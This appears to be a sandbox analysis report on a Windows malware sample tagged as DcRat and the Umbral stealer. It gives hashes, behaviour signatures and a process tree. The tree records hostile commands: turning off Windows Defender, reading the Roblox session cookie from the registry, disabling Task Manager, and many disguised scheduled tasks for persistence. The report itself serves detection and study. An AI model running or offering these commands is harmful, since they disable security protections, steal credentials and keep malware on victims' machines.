Overview

overview

10

Static

static

3

spglr64.exe

windows7-x64

10

spglr64.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-08-2024 22:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    spglr64.exe

  • Size

    1.5MB

  • MD5

    31f61e9c68256b4cc089b3703c0e2039

  • SHA1

    5ed8cecacc5e6165d43ee91787f72846d2e8ad01

  • SHA256

    8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc

  • SHA512

    ae48468132212e4756864fe7ce22d55c35d53cadd482aebabd62ec9d724ea3786879d9364563613140a43fa6c63a6c5cc1ee1775e4e0e9977aee3b748d8a6df1

  • SSDEEP

    24576:yuDXTIGaPhEYzUzA0bOvbKAO1WMbkiSfLAo9Ffze20S4OIsAMWlXl9h2DvpfsTCu:1Djlabwz9Sv61kiQKvS4OUMI4hfaD

Score
10/10
dcratumbralcredential_accessdiscoveryevasionexecutioninfostealerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detect Umbral payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 25 IoCs
    persistence
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
    evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 50 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • System policy modification 1 TTPs 9 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\spglr64.exe
    "C:\Users\Admin\AppData\Local\Temp\spglr64.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe
      "C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1504
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe"
        3⤵
        • Views/modifies file attributes
        PID:4400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3808
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5112
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:5048
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:4060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4520
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:1256
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealqqgwrffs.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:3520
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:536
        • C:\Users\Admin\AppData\Local\Temp\ratgergedrghi.exe
          "C:\Users\Admin\AppData\Local\Temp\ratgergedrghi.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1256
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\providerWinsessionruntimehost\Xt9KI1krEJFJGvttvIkhdsOgzo3.vbe"
            3⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4492
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\providerWinsessionruntimehost\g3CEdDrA4txDO2RaU.bat" "
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1364
              • C:\providerWinsessionruntimehost\Surrogatereviewsession.exe
                "C:\providerWinsessionruntimehost\Surrogatereviewsession.exe"
                5⤵
                • Modifies WinLogon for persistence
                • UAC bypass
                • Checks computer location settings
                • Executes dropped EXE
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Drops file in Program Files directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                • System policy modification
                PID:2856
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0bAySDsW00.bat"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2740
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    7⤵
                      PID:2164
                    • C:\providerWinsessionruntimehost\Surrogatereviewsession.exe
                      "C:\providerWinsessionruntimehost\Surrogatereviewsession.exe"
                      7⤵
                      • Modifies WinLogon for persistence
                      • UAC bypass
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Checks whether UAC is enabled
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      • System policy modification
                      PID:4796
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SwJmsnywsR.bat"
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4192
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          9⤵
                            PID:512
                          • C:\providerWinsessionruntimehost\csrss.exe
                            "C:\providerWinsessionruntimehost\csrss.exe"
                            9⤵
                            • UAC bypass
                            • Executes dropped EXE
                            • Checks whether UAC is enabled
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: GetForegroundWindowSpam
                            • System policy modification
                            PID:5052
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:4728
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\explorer.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4416
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\explorer.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:3704
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\explorer.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1648
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\winlogon.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5088
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1580
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:4332
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\providerWinsessionruntimehost\System.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1168
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\System.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4956
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\providerWinsessionruntimehost\System.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3544
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\conhost.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3048
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\conhost.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:408
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\conhost.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3788
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1964
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4132
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\providerWinsessionruntimehost\csrss.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3148
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe'" /f
            1⤵
            • Process spawned unexpected child process
            PID:4104
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3604
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:744
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\providerWinsessionruntimehost\upfc.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4136
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\upfc.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4660
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\providerWinsessionruntimehost\upfc.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:2480
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\WaaSMedicAgent.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4192
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WaaSMedicAgent.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4060
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\WaaSMedicAgent.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2208
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\WmiPrvSE.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:512
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\WmiPrvSE.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:2316
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\WmiPrvSE.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1900
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\providerWinsessionruntimehost\sppsvc.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3952
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\sppsvc.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:2100
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\providerWinsessionruntimehost\sppsvc.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4652
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3232
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1484
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:436
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:548
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3020
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4988
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\providerWinsessionruntimehost\cmd.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1648
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\providerWinsessionruntimehost\cmd.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2412
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\providerWinsessionruntimehost\cmd.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1924
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Saved Games\OfficeClickToRun.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2940
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\OfficeClickToRun.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3308
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Saved Games\OfficeClickToRun.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2336
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4532
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:2508
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:656
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\unsecapp.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2660
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\unsecapp.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3632
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\unsecapp.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2248
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3732
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1344
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4104
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\backgroundTaskHost.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:3512
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\backgroundTaskHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4024
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\backgroundTaskHost.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3760
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\WaaSMedicAgent.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3252
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\WaaSMedicAgent.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3120
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\WaaSMedicAgent.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2988
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2128
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4900
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3236
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\upfc.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            PID:4932
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\upfc.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4496
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\upfc.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1520
          • C:\Windows\system32\schtasks.exe
